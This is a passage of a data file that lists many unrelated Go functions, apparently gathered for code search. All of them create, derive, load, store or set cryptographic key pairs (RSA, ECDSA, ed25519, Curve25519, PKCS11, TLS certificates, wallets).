2048)\n\n\tif err != nil {\n\t\tlog.Fatal(\"Error in generating key-value pair, error is\", err)\n\t}\n\treturn privateKey\n}", "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.feclt.GetKeyPair(id)\n}", "func Keypair(rand io.Reader) (publicKey PublicKey, privateKey PrivateKey, err error) {\n\tpublic, private, err := ed25519.GenerateKey(rand)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn PublicKey(public), PrivateKey(private), nil\n}", "func (c *Conn) SetPrivateKey(privateKey wgcfg.PrivateKey) error {\n\tc.derpMu.Lock()\n\tdefer c.derpMu.Unlock()\n\n\toldKey, newKey := c.privateKey, key.Private(privateKey)\n\tif newKey == oldKey {\n\t\treturn nil\n\t}\n\tc.privateKey = newKey\n\tif oldKey.IsZero() {\n\t\t// Initial configuration on start.\n\t\treturn nil\n\t}\n\n\t// Key changed. Close any DERP connections.\n\tc.closeAllDerpLocked()\n\n\treturn nil\n}", "func (in *SSHKeyPair) DeepCopy() *SSHKeyPair {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(SSHKeyPair)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func KeyPair() (*[PUBLICKEYBYTES]byte, *[SECRETKEYBYTES]byte) {\n\tpublicKey := [PUBLICKEYBYTES]byte{}\n\tprivateKey := [SECRETKEYBYTES]byte{}\n\tpublicKeyPtr := (*C.uchar)(unsafe.Pointer(&publicKey))\n\tprivateKeyPtr := (*C.uchar)(unsafe.Pointer(&privateKey))\n\tC.crypto_vrf_keypair(publicKeyPtr, privateKeyPtr)\n\treturn &publicKey, &privateKey\n}", "func NewKeyPair() (ecdsa.PrivateKey, []byte) {\n\tellipticCurve := EllipticCurve()\n\n\tprivateKey, err := ecdsa.GenerateKey(ellipticCurve, rand.Reader)\n\tif err != nil {\n\t\tlog.Panic(err)\n\t}\n\tX := privateKey.PublicKey.X.Bytes()\n\tY := privateKey.PublicKey.Y.Bytes()\n\t//fmt.Println(len(X), X)\n\t//fmt.Println(len(Y), Y)\n\tpublicKey := append(\n\t\tX, // 32 bytes (P256)\n\t\tY..., // 32 bytes (P256)\n\t) // 64 bytes => 64 * 8 bits = 512 bits (perchè usiamo P256 o secp256k)\n\treturn *privateKey, publicKey\n}", "func GenerateKeyPair() ([]byte, []byte) {\n\tconst seckeyLen = 32\n\tvar seckey []byte\n\tvar pubkey []byte\n\nnew_seckey:\n\tseckey = RandByte(seckeyLen)\n\tif secp.SeckeyIsValid(seckey) != 1 {\n\t\tgoto new_seckey // regen\n\t}\n\n\tpubkey = pubkeyFromSeckey(seckey)\n\tif pubkey == nil {\n\t\tlog.Panic(\"IMPOSSIBLE: pubkey invalid from valid seckey\")\n\t\tgoto new_seckey\n\t}\n\tif ret := secp.PubkeyIsValid(pubkey); ret != 1 {\n\t\tlog.Panicf(\"ERROR: Pubkey invalid, ret=%d\", ret)\n\t\tgoto new_seckey\n\t}\n\n\treturn pubkey, seckey\n}", "func (client *Client) GetKeyPair(id string) (*model.KeyPair, error) {\n\treturn client.osclt.GetKeyPair(id)\n}", "func DeriveKeyPair(scheme Scheme, uri string) (kp KeyPair, err error) {\n\tphrase, path, pwd, err := splitURI(uri)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif b, ok := DecodeHex(phrase); ok {\n\t\tkp, err = scheme.FromSeed(b)\n\t} else {\n\t\tkp, err = scheme.FromPhrase(phrase, pwd)\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tdjs, err := deriveJunctions(derivePath(path))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn scheme.Derive(kp, djs)\n}", "func generateKeyPair() (publicKey, privateKey *[32]byte, err error) {\n\treturn box.GenerateKey(rand.Reader)\n}", "func GenerateKeyPair(h func() hash.Hash, seed []byte) (*PublicKey, *PrivateKey, error) {\n\tif len(seed) != 0 && len(seed) != seedSize {\n\t\treturn nil, nil, errors.New(\"invalid size of seed\")\n\t}\n\n\tokm, err := generateOKM(seed, h)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tprivKeyFr := frFromOKM(okm)\n\n\tprivKey := &PrivateKey{privKeyFr}\n\tpubKey := privKey.PublicKey()\n\n\treturn pubKey, privKey, nil\n}", "func (w *Whisper) DeleteKeyPair(key string) bool {\n\tw.keyMu.Lock()\n\tdefer w.keyMu.Unlock()\n\n\tif w.privateKeys[key] != nil {\n\t\tdelete(w.privateKeys, key)\n\t\treturn true\n\t}\n\treturn false\n}", "func (s Seed) deriveKeyPair(index uint64) (keypair [64]byte) {\n\tbuf := make([]byte, len(s.siadSeed)+8)\n\tn := copy(buf, s.siadSeed[:])\n\tbinary.LittleEndian.PutUint64(buf[n:], index)\n\tseed := blake2b.Sum256(buf)\n\tcopy(keypair[:], ed25519.NewKeyFromSeed(seed[:]))\n\treturn\n}", "func deleteKeyPair(cf *Cloudformation, keyPair string, err error) {\n\tif err != nil {\n\t\tfmt.Printf(\"Key pair deleted %s because stack failed with err: \\n %s \\n\", keyPair, err)\n\t\tos.Exit(1)\n\t}\n\t_, keyErr := cf.ec2Res.deleteKeyPair(keyPair)\n\tif keyErr != nil {\n\t\tfmt.Printf(\"Delete key pair err: %s \\n\", keyErr)\n\t}\n}", "func NewKeyPair(config CreateKeyPairConfig) (KeyPair, error) {\n\tif config.Type == Default {\n\t\tconfig.Type = Ecdsa\n\t}\n\n\tswitch config.Type {\n\tcase Ecdsa:\n\t\treturn newEcdsaKeyPair(config)\n\tcase Rsa:\n\t\treturn newRsaKeyPair(config)\n\t}\n\n\treturn KeyPair{}, fmt.Errorf(\"Unable to generate new key pair, type %s is not supported\",\n\t\tconfig.Type.String())\n}", "func NewKeyPair(suite suites.Suite, random cipher.Stream) (kyber.Scalar, kyber.Point) {\n\tx := suite.G2().Scalar().Pick(random)\n\tX := suite.G2().Point().Mul(x, nil)\n\treturn x, X\n}", "func (w *Whisper) NewKeyPair() (string, error) {\n\tkey, err := crypto.GenerateKey()\n\tif err != nil || !validatePrivateKey(key) {\n\t\tkey, err = crypto.GenerateKey() // retry once\n\t}\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif !validatePrivateKey(key) {\n\t\treturn \"\", fmt.Errorf(\"failed to generate valid key\")\n\t}\n\n\tid, err := GenerateRandomID()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to generate ID: %s\", err)\n\t}\n\n\tw.keyMu.Lock()\n\tdefer w.keyMu.Unlock()\n\n\tif w.privateKeys[id] != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to generate unique ID\")\n\t}\n\tw.privateKeys[id] = key\n\treturn id, nil\n}", "func (client *NginxClient) ModifyKeyValPair(zone string, key string, val string) error {\n\treturn client.modifyKeyValPair(zone, key, val, httpContext)\n}", "func setTargetCertKeyPairSecret(s *corev1.Secret, validity time.Duration, signer *crypto.CA, certCreator certificateRotation) error {\n\tif s.Annotations == nil {\n\t\ts.Annotations = map[string]string{}\n\t}\n\tif s.Data == nil {\n\t\ts.Data = map[string][]byte{}\n\t}\n\n\t// our annotation is based on our cert validity, so we want to make sure that we don't specify something past our signer\n\ttargetValidity := validity\n\tremainingSignerValidity := time.Until(signer.Config.Certs[0].NotAfter)\n\tif remainingSignerValidity < validity {\n\t\ttargetValidity = remainingSignerValidity\n\t}\n\n\tcertKeyPair, err := certCreator.NewCertificate(signer, targetValidity)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ts.Data[corev1.TLSCertKey], s.Data[corev1.TLSPrivateKeyKey], err = certKeyPair.GetPEMBytes()\n\tif err != nil {\n\t\treturn err\n\t}\n\tcertCreator.SetAnnotations(certKeyPair, s.Annotations)\n\n\treturn nil\n}", "func GenerateKeyPair(h func() hash.Hash, seed []byte) (*PublicKey, *PrivateKey, error) {\n\tif len(seed) != 0 && len(seed) != seedSize {\n\t\treturn nil, nil, errors.New(\"invalid size of seed\")\n\t}\n\n\tokm, err := generateOKM(seed, h)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tprivKeyFr, err := frFromOKM(okm)\n\tif err != nil {\n\t\treturn nil, nil, fmt.Errorf(\"convert OKM to FR: %w\", err)\n\t}\n\n\tprivKey := &PrivateKey{PrivKey: g2pubs.NewSecretKeyFromFR(privKeyFr)}\n\tpubKey := privKey.PublicKey()\n\n\treturn pubKey, privKey, nil\n}", "func (sc *SessionContext) SetRequestPair(w http.ResponseWriter, r *http.Request) {\n\tsc.request = r\n\tsc.response = w\n}", "func (vdb *VspDatabase) KeyPair() (ed25519.PrivateKey, ed25519.PublicKey, error) {\n\tvar seed []byte\n\terr := vdb.db.View(func(tx *bolt.Tx) error {\n\t\tvspBkt := tx.Bucket(vspBktK)\n\n\t\ts := vspBkt.Get(privateKeyK)\n\n\t\t// Byte slices returned from Bolt are only valid during a transaction.\n\t\t// Need to make a copy.\n\t\tseed = make([]byte, len(s))\n\t\tcopy(seed, s)\n\n\t\tif seed == nil {\n\t\t\t// should not happen\n\t\t\treturn fmt.Errorf(\"no private key found\")\n\t\t}\n\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tsignKey := ed25519.NewKeyFromSeed(seed)\n\n\t// Derive pubKey from signKey\n\tpubKey, ok := signKey.Public().(ed25519.PublicKey)\n\tif !ok {\n\t\treturn nil, nil, fmt.Errorf(\"failed to cast signing key: %T\", pubKey)\n\t}\n\n\treturn signKey, pubKey, err\n}", "func (r *Person) SetRelationship(field string, rel interface{}) error {\n\tswitch field {\n\tcase \"Pets\":\n\t\trecords, ok := rel.([]kallax.Record)\n\t\tif !ok {\n\t\t\treturn fmt.Errorf(\"kallax: relationship field %s needs a collection of records, not %T\", field, rel)\n\t\t}\n\n\t\tr.Pets = make([]*Pet, len(records))\n\t\tfor i, record := range records {\n\t\t\trel, ok := record.(*Pet)\n\t\t\tif !ok {\n\t\t\t\treturn fmt.Errorf(\"kallax: element of type %T cannot be added to relationship %s\", record, field)\n\t\t\t}\n\t\t\tr.Pets[i] = rel\n\t\t}\n\t\treturn nil\n\n\t}\n\treturn fmt.Errorf(\"kallax: model Person has no relationship %s\", field)\n}", "func (lib *PKCS11Lib) GenerateECDSAKeyPair(c elliptic.Curve) (*PKCS11PrivateKeyECDSA, error) {\n\treturn lib.GenerateECDSAKeyPairOnSlot(lib.Slot.id, nil, nil, c)\n}", "func LoadKeyPair(fname string) (*KeyPair, error) {\n\tf, err := os.Open(fname)\n\tif err != nil {\n\t\treturn nil, errors.Wrapf(err, \"ssb.LoadKeyPair: could not open key file %s\", fname)\n\t}\n\tdefer f.Close()\n\n\treturn ParseKeyPair(nocomment.NewReader(f))\n}", "func CreateKeyPair() (pubKey PublicKey, secKey SecretKey, err error) {\n\terrorCode := C.crypto_sign_keypair((*C.uchar)(&pubKey[0]), (*C.uchar)(&secKey[0]))\n\tif errorCode != 0 {\n\t\terr = errors.New(\"call to crypto_sign_keypair failed\")\n\t}\n\treturn\n}", "func (sas serviceAccounts) ForKeyPair(\n\tkeyID, keySecret string,\n) (*models.ServiceAccount, error) {\n\tsa := []*models.ServiceAccount{}\n\tif _, err := sas.storage.PG.DB.Query(\n\t\t&sa, `SELECT id, name, key_id, key_secret, email, base_role_id\n\t\tFROM service_accounts WHERE key_id = ? AND key_secret = ?`,\n\t\tkeyID, keySecret,\n\t); err != nil {\n\t\treturn nil, err\n\t}\n\tif len(sa) == 0 {\n\t\treturn nil, errors.NewEntityNotFoundError(models.ServiceAccount{}, keyID)\n\t}\n\treturn sa[0], nil\n}", "func (k Keeper) SetRecord(ctx sdk.Context, key types.RecordCompositeKey, record types.Record) {\n\tstore := prefix.NewStore(ctx.KVStore(k.storeKey), types.RecordKeyPrefix)\n\tb := k.cdc.MustMarshal(&record)\n\tstore.Set(compkey.MustEncode(&key), b)\n}", "func GenerateSigningKeyPair(publicFileName, privateFileName, curveType string) (err error) {\n\tvar publicKey, privateKey []byte\n\tswitch strings.ToLower(curveType) {\n\tcase CurveSecp256K1:\n\t\tpublicKey, privateKey, err = secp256k1.GenerateSigningKeyPair()\n\tcase CurveEd25519:\n\t\tpublicKey, privateKey, err = ed25519.GenerateSigningKeyPair()\n\tdefault:\n\t\tpublicKey, privateKey, err = ed25519.GenerateSigningKeyPair()\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = utils.WriteKeyToPemFile(privateFileName, utils.PrivateKey, privateKey)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = utils.WriteKeyToPemFile(publicFileName, utils.PublicKey, publicKey)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (p *ph) KeyPair() (publicKey, privateKey []byte, err error) {\n\tsecretKey, err := randomBytes(p._SKLEN)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\tpublicKey, err = p.PubKey(secretKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treturn publicKey, secretKey, nil\n}", "func GenerateKeypair() (*Keypair, error) {\n\tvar publicKey [32]byte\n\tvar privateKey [32]byte\n\t_, err := rand.Read(privateKey[:])\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcurve25519.ScalarBaseMult(&publicKey, &privateKey)\n\treturn &Keypair{publicKey, privateKey}, nil\n}", "func (o *CloudAwsVirtualMachineAllOf) GetKeyPairOk() (*CloudAwsKeyPairRelationship, bool) {\n\tif o == nil || o.KeyPair == nil {\n\t\treturn nil, false\n\t}\n\treturn o.KeyPair, true\n}", "func GenerateCurve25519KeyPair() (*Curve25519KeyPair, error) {\n\treturn generateCurve25519KeyPairFromRandom(rand.Reader)\n}", "func SetPrvKey(prvkeyHex string) *bind.TransactOpts {\n\tkeyBytes := common.FromHex(prvkeyHex)\n\tkey := crypto.ToECDSAUnsafe(keyBytes)\n\treturn bind.NewKeyedTransactor(key)\n}", "func KeyPair() (publicKey, privateKey []byte, err error) {\n\treturn defaultPH.KeyPair()\n}", "func (v *PublicParamsManager) NewCertifierKeyPair() ([]byte, []byte, error) {\n\tpanic(\"NewCertifierKeyPair cannot be called from fabtoken\")\n}", "func (p PrivateKey) calculateKeyPair() ([]byte, *edwards25519.Scalar, error) {\n\tvar pA edwards25519.Point\n\tvar sa edwards25519.Scalar\n\n\tk, err := (&edwards25519.Scalar{}).SetBytesWithClamping(p)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tpub := pA.ScalarBaseMult(k).Bytes()\n\tsignBit := (pub[31] & 0x80) >> 7\n\n\tif signBit == 1 {\n\t\tsa.Negate(k)\n\t\t// Set sig bit to 0\n\t\tpub[31] &= 0x7F\n\t} else {\n\t\tsa.Set(k)\n\t}\n\n\treturn pub, &sa, nil\n}", "func (c *FilesBuilder) AddKeyPair(ctx context.Context, name string,\n\tf func(context.Context, *cke.Node) (cert, key []byte, err error)) error {\n\tvar mu sync.Mutex\n\tcertMap := make(map[string][]byte)\n\tkeyMap := make(map[string][]byte)\n\n\tenv := well.NewEnvironment(ctx)\n\tfor _, n := range c.nodes {\n\t\tn := n\n\t\tenv.Go(func(ctx context.Context) error {\n\t\t\tcertData, keyData, err := f(ctx, n)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tmu.Lock()\n\t\t\tcertMap[n.Address] = certData\n\t\t\tkeyMap[n.Address] = keyData\n\t\t\tmu.Unlock()\n\t\t\treturn nil\n\t\t})\n\t}\n\tenv.Stop()\n\terr := env.Wait()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tc.files = append(c.files, fileData{name + \".crt\", certMap})\n\tc.files = append(c.files, fileData{name + \".key\", keyMap})\n\treturn nil\n}", "func TestingKeyPair() *CertInfo {\n\tkeypair, err := tls.X509KeyPair(testCertPEMBlock, testKeyPEMBlock)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"invalid X509 keypair material: %v\", err))\n\t}\n\n\tcert := &CertInfo{\n\t\tkeypair: keypair,\n\t}\n\n\treturn cert\n}", "func (o OceanOutput) KeyPair() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *Ocean) pulumi.StringPtrOutput { return v.KeyPair }).(pulumi.StringPtrOutput)\n}", "func SaveEncodedKeypair(cfg Configurable, secretsClient *secretsapi.Client, encKeypair *EncodedKeypair) error {\n\tparams := keys.NewSaveKeypairParams().WithKeypair(&secretsModels.KeypairChange{\n\t\tEncryptedPrivateKey: &encKeypair.EncodedPrivateKey,\n\t\tPublicKey: &encKeypair.EncodedPublicKey,\n\t})\n\n\tif _, err := secretsClient.Keys.SaveKeypair(params, authentication.LegacyGet().ClientAuth()); err != nil {\n\t\treturn locale.WrapError(err, \"keypair_err_save\")\n\t}\n\n\t// save the keypair locally to avoid authenticating the keypair every time it's used\n\treturn SaveWithDefaults(cfg, encKeypair.Keypair)\n}", "func (o *CloudAwsVirtualMachineAllOf) HasKeyPair() bool {\n\tif o != nil && o.KeyPair != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (_Contract *ContractTransactor) SetPubkey(opts *bind.TransactOpts, node [32]byte, x [32]byte, y [32]byte) (*types.Transaction, error) {\n\treturn _Contract.contract.Transact(opts, \"setPubkey\", node, x, y)\n}", "func (symmetricKey *SymmetricKey) SetKey(key []byte) error {\n\tsymmetricKey.mutex.Lock()\n\tsymmetricKey.SymmetricKey = key\n\tsymmetricKey.mutex.Unlock()\n\treturn nil\n}", "func EncodeKeypair(keypair Keypair, passphrase string) (*EncodedKeypair, error) {\n\tvar encodedPrivateKey string\n\tvar err error\n\n\tif passphrase == \"\" {\n\t\tencodedPrivateKey = keypair.EncodePrivateKey()\n\t} else {\n\t\tencodedPrivateKey, err = keypair.EncryptAndEncodePrivateKey(passphrase)\n\t\tif err != nil {\n\t\t\treturn nil, errs.Wrap(err, \"Could not encrypt encoded private key\")\n\t\t}\n\t}\n\n\tencodedPublicKey, err := keypair.EncodePublicKey()\n\tif err != nil {\n\t\treturn nil, errs.Wrap(err, \"Could not encode public key\")\n\t}\n\n\treturn &EncodedKeypair{\n\t\tKeypair: keypair,\n\t\tEncodedPrivateKey: encodedPrivateKey,\n\t\tEncodedPublicKey: encodedPublicKey,\n\t}, nil\n}", "func (session *Session) GenerateRSAKeyPair(tokenLabel string, tokenPersistent bool, expDate time.Time, bits int) (pkcs11.ObjectHandle, pkcs11.ObjectHandle, error) {\n\tif session == nil || session.Ctx == nil {\n\t\treturn 0, 0, fmt.Errorf(\"session not initialized\")\n\t}\n\ttoday := time.Now()\n\tpublicKeyTemplate := []*pkcs11.Attribute{\n\t\tpkcs11.NewAttribute(pkcs11.CKA_CLASS, pkcs11.CKO_PUBLIC_KEY),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_LABEL, session.Label),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_ID, []byte(tokenLabel)),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_KEY_TYPE, pkcs11.CKK_RSA),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_TOKEN, tokenPersistent),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_START_DATE, today),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_END_DATE, expDate),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_VERIFY, true),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_PUBLIC_EXPONENT, []byte{1, 0, 1}),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_MODULUS_BITS, bits),\n\t}\n\n\tprivateKeyTemplate := []*pkcs11.Attribute{\n\t\tpkcs11.NewAttribute(pkcs11.CKA_CLASS, pkcs11.CKO_PRIVATE_KEY),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_LABEL, session.Label),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_ID, []byte(tokenLabel)),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_KEY_TYPE, pkcs11.CKK_RSA),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_TOKEN, tokenPersistent),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_START_DATE, today),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_END_DATE, expDate),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_SIGN, true),\n\t\tpkcs11.NewAttribute(pkcs11.CKA_SENSITIVE, true),\n\t}\n\n\tpubKey, privKey, err := session.Ctx.GenerateKeyPair(\n\t\tsession.Handle,\n\t\t[]*pkcs11.Mechanism{\n\t\t\tpkcs11.NewMechanism(pkcs11.CKM_RSA_PKCS_KEY_PAIR_GEN, nil),\n\t\t},\n\t\tpublicKeyTemplate,\n\t\tprivateKeyTemplate,\n\t)\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\treturn pubKey, privKey, nil\n}", "func (x *Ed25519Credentials) SetPrivateKey(privatekey PrivateKey) error {\n\n\tif privatekey.Algorithm != AlgorithmEd25519 {\n\t\treturn fmt.Errorf(\"Algorithm mismatch %v vs %v\", privatekey.Algorithm, AlgorithmEd25519)\n\t}\n\n\tst, ok := privatekey.Private.(string)\n\tif !ok {\n\t\treturn ErrInvalidPrivateKeyType\n\t}\n\n\tif len(st) != base64.URLEncoding.EncodedLen(ed25519.PrivateKeySize) {\n\t\treturn fmt.Errorf(\"Key data incorrect length\")\n\t}\n\n\tbytes, err := base64.URLEncoding.DecodeString(st)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tx.Private = bytes\n\n\treturn nil\n\n}", "func (cli *BaseClient) SyncClonePair(ctx context.Context, clonePairID string) error {\n\tdata := map[string]interface{}{\n\t\t\"ID\": clonePairID,\n\t\t\"copyAction\": 0,\n\t}\n\n\tresp, err := cli.Put(ctx, \"/clonepair/synchronize\", data)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tcode := int64(resp.Error[\"code\"].(float64))\n\tif code != 0 {\n\t\treturn fmt.Errorf(\"Sync ClonePair %s error: %d\", clonePairID, code)\n\t}\n\n\treturn nil\n}", "func (s stack) ListKeyPairs(context.Context) ([]*abstract.KeyPair, fail.Error) {\n\treturn nil, fail.NotImplementedError(\"ListKeyPairs() not implemented yet\") // FIXME: Technical debt\n}", "func (c *Config) SetSSHKeyPermissions() error {\n\tprivateKey := c.GetSSHKeyPath()\n\tcmd := exec.Command(\"chmod\", \"0600\", privateKey)\n\tutil.PrintCommand(cmd)\n\tout, err := cmd.CombinedOutput()\n\tif err != nil {\n\t\tlog.Printf(\"Error while trying to change private ssh key permissions at %s: %s\\n\", privateKey, out)\n\t\treturn err\n\t}\n\tpublicKey := c.GetSSHKeyPath() + \".pub\"\n\tcmd = exec.Command(\"chmod\", \"0600\", publicKey)\n\tutil.PrintCommand(cmd)\n\tout, err = cmd.CombinedOutput()\n\tif err != nil {\n\t\tlog.Printf(\"Error while trying to change public ssh key permissions at %s: %s\\n\", publicKey, out)\n\t\treturn err\n\t}\n\treturn nil\n}", "func (db *SQLStore) SetRecord(rec *CertRecord) error {\n\tif err := db.conn.Ping(); err != nil {\n\t\treturn err\n\t}\n\t_, err := db.set.Exec(rec.KeyID, rec.Principals, rec.CreatedAt, rec.Expires, rec.Raw)\n\treturn err\n}", "func (s *MemStore) SetRole(k string, r common.Role) {\n\ts.did[k] = r\n}", "func (s *State) SenderRatchetKeyPair() *ecc.ECKeyPair {\n\treturn s.senderChain.senderRatchetKeyPair\n}", "func (lib *PKCS11Lib) GenerateRSAKeyPair(bits int, purpose KeyPurpose) (*PKCS11PrivateKeyRSA, error) {\n\treturn lib.GenerateRSAKeyPairOnSlot(lib.Slot.id, nil, nil, bits, purpose)\n}", "func GenLamportKeyPair() *Keypair {\n\tkp := Keypair{\n\t\tpublic: [256]*key{},\n\t\tprivate: [256]*key{},\n\t}\n\n\tpub, priv := genKeyPair()\n\tcopy(kp.public[:], pub)\n\tcopy(kp.private[:], priv)\n\treturn &kp\n}", "func ExampleMicroStellar_CreateKeyPair() {\n\tms := New(\"test\")\n\n\t// Generate a new random keypair.\n\tpair, err := ms.CreateKeyPair()\n\n\tif err != nil {\n\t\tlog.Fatalf(\"CreateKeyPair: %v\", err)\n\t}\n\n\t// Display address and key\n\tlog.Printf(\"Private seed: %s, Public address: %s\", pair.Seed, pair.Address)\n\n\tfmt.Printf(\"ok\")\n\t// Output: ok\n}", "func ExampleMicroStellar_CreateKeyPair() {\n\tms := New(\"test\")\n\n\t// Generate a new random keypair.\n\tpair, err := ms.CreateKeyPair()\n\n\tif err != nil {\n\t\tlog.Fatalf(\"CreateKeyPair: %v\", err)\n\t}\n\n\t// Display address and key\n\tlog.Printf(\"Private seed: %s, Public address: %s\", pair.Seed, pair.Address)\n\n\tfmt.Printf(\"ok\")\n\t// Output: ok\n}", "func (m *Application) SetKeyCredentials(value []KeyCredentialable)() {\n m.keyCredentials = value\n}", "func (_ResolverContract *ResolverContractTransactor) SetPubkey(opts *bind.TransactOpts, node [32]byte, x [32]byte, y [32]byte) (*types.Transaction, error) {\n\treturn _ResolverContract.contract.Transact(opts, \"setPubkey\", node, x, y)\n}", "func (c *CertInfo) KeyPair() tls.Certificate {\n\treturn c.keypair\n}", "func CreateKeyPairCommand() *cobra.Command {\n\n\tkeysCmd := &cobra.Command{\n\t\tUse: \"keypair\",\n\t\tShort: \"create the account with mnemonic, private key, public key and address\",\n\t\tLong: `create the account with mnemonic, private key, public key and address`,\n\t\tRunE: func(_ *cobra.Command, _ []string) error {\n\n\t\t\tnode, err := createNode()\n\t\t\tkp := []Keypair{}\n\t\t\tfor j := 0; j < node; j++ {\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Println(\"keypair creating\", err)\n\t\t\t\t}\n\t\t\t\t_ = strconv.Itoa(j)\n\t\t\t\tentropy, _ := bip39.NewEntropy(256)\n\t\t\t\tmnemonic, _ := bip39.NewMnemonic(entropy)\n\t\t\t\tseed := bip39.NewSeed(mnemonic, \"123456\")\n\t\t\t\tfirst := seed[:32]\n\t\t\t\tprivatekey := ed25519.NewKeyFromSeed(first)\n\t\t\t\tpublicKey := ed25519.PublicKey(privatekey)\n\t\t\t\tkeys := Keypair{Mnemonic: mnemonic, Privatekey: privatekey, Publickkey: publicKey}\n\t\t\t\tkp = append(kp, keys)\n\n\t\t\t}\n\n\t\t\tkpjson, _ := json.Marshal(kp)\n\t\t\toutputDocumet, err := makeOutputFilepath(DefaultHome)\n\t\t\terr = ioutil.WriteFile(outputDocumet, kpjson, 0644)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\t\t\treturn nil\n\t\t},\n\t}\n\n\treturn keysCmd\n}", "func (mapper *Mapper) MapPair(key Key, goValue interface{}) {\n\tmapper.doMap(key, goValue)\n}", "func (o ClusterNodeAttributeOutput) KeyPairName() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeAttribute) string { return v.KeyPairName }).(pulumi.StringOutput)\n}", "func GenerateKeypair() (privkey, pubkey []byte, err error) {\n\tpair, err := noise.DH25519.GenerateKeypair(rand.Reader)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\t// pair.Public is already filled in; assert here that PubkeyFromPrivkey\n\t// agrees with it.\n\tderivedPubkey := PubkeyFromPrivkey(pair.Private)\n\tif !bytes.Equal(derivedPubkey, pair.Public) {\n\t\tpanic(fmt.Sprintf(\"expected pubkey %x, got %x\", derivedPubkey, pair.Public))\n\t}\n\n\treturn pair.Private, pair.Public, nil\n}", "func useX509KeyPair(transport *http.Transport, certFile, keyFile string) error {\n\tconfig := transport.TLSClientConfig\n\tif config == nil {\n\t\tconfig = &tls.Config{}\n\t} else {\n\t\tconfig = config.Clone()\n\t}\n\tif _, err := SetX509KeyPairToTLSConfig(certFile, keyFile, config); err != nil {\n\t\treturn err\n\t}\n\n\ttransport.TLSClientConfig = config\n\treturn nil\n}", "func CreateKeyPair() (publicKeyBytes []byte, privateKeyBytes []byte, err error) {\n\tprivateKey, _ := rsa.GenerateKey(rand.Reader, 2048)\n\tpublicKey := privateKey.PublicKey\n\tpub, err := ssh.NewPublicKey(&publicKey)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tpublicKeyBytes = ssh.MarshalAuthorizedKey(pub)\n\n\tpriBytes := x509.MarshalPKCS1PrivateKey(privateKey)\n\tprivateKeyBytes = pem.EncodeToMemory(\n\t\t&pem.Block{\n\t\t\tType: \"RSA PRIVATE KEY\",\n\t\t\tBytes: priBytes,\n\t\t},\n\t)\n\treturn publicKeyBytes, privateKeyBytes, nil\n}", "func (client *Client) ListKeyPairs() ([]model.KeyPair, error) {\n\treturn client.feclt.ListKeyPairs()\n}", "func (hd *HDWallet) KeyPair() (ed25519.PrivateKey, ed25519.PublicKey) {\n\n\tpath, err := bip32path.ParsePath(fmt.Sprintf(pathString, hd.index))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tcurve := eddsa.Ed25519()\n\tkey, err := slip10.DeriveKeyFromPath(hd.seed, curve, path)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tpubKey, privKey := key.Key.(eddsa.Seed).Ed25519Key()\n\n\treturn ed25519.PrivateKey(privKey), ed25519.PublicKey(pubKey)\n}" ]
